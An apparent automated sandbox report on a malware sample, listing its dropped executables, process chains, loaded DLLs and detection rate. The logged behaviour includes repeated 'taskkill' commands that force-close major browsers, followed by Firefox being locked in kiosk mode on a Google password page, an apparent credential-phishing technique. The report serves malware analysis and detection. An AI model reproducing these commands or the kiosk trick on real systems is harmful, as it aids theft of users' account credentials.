Source: file.exe, 00000000.00000003.2186543484.0000000005C0A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186465399.0000000005C17000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174475307.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174129641.0000000005C08000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2895905550.0000000005974000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2911883577.0000000005963000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2911735199.000000000596E000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056287581.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3050315426.0000000006008000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3069419629.0000000005FFA000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3069032273.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe Virustotal: Detection: 47%
Source: 7YW0363WEKP7ULOI0QRA.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 58ce8f976c.exe String found in binary or memory: "app.update.lastUpdateTime.recipe-client-addon-run", 1696486832); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836); user_pref("app.update.lastUpdateTime.xpi-signatur
Source: 58ce8f976c.exe String found in binary or memory: p.update.lastUpdateTime.recipe-client-addon-run", 1696486832); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836); user_pref("app.update.lastUpdateTime.xpi-signature-v
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe "C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe "C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe"
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe "C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe "C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe "C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe "C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe"
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2308 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2220 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa78a0b3-bca7-4b7b-8021-d7d875974ef5} 1812 "\\.\pipe\gecko-crash-server-pipe.1812" 19e3b86f310 socket
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process created: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe "C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe "C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4112 -parentBuildID 20230927232528 -prefsHandle 4172 -prefMapHandle 4168 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e2b9126-91e2-41af-b164-fbbe6f838f36} 1812 "\\.\pipe\gecko-crash-server-pipe.1812" 19e4cd8c210 rdd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002538001\num.exe "C:\Users\user\AppData\Local\Temp\1002538001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process created: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe "C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe "C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe"
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002538001\num.exe "C:\Users\user\AppData\Local\Temp\1002538001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process created: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe "C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe"
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process created: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe "C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe "C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe "C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe "C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe "C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe "C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process created: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe "C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process created: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe "C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process created: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe "C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe"
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process created: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe "C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe"
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2308 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2220 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa78a0b3-bca7-4b7b-8021-d7d875974ef5} 1812 "\\.\pipe\gecko-crash-server-pipe.1812" 19e3b86f310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4112 -parentBuildID 20230927232528 -prefsHandle 4172 -prefMapHandle 4168 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e2b9126-91e2-41af-b164-fbbe6f838f36} 1812 "\\.\pipe\gecko-crash-server-pipe.1812" 19e4cd8c210 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: userenv.dll Jump to behavior
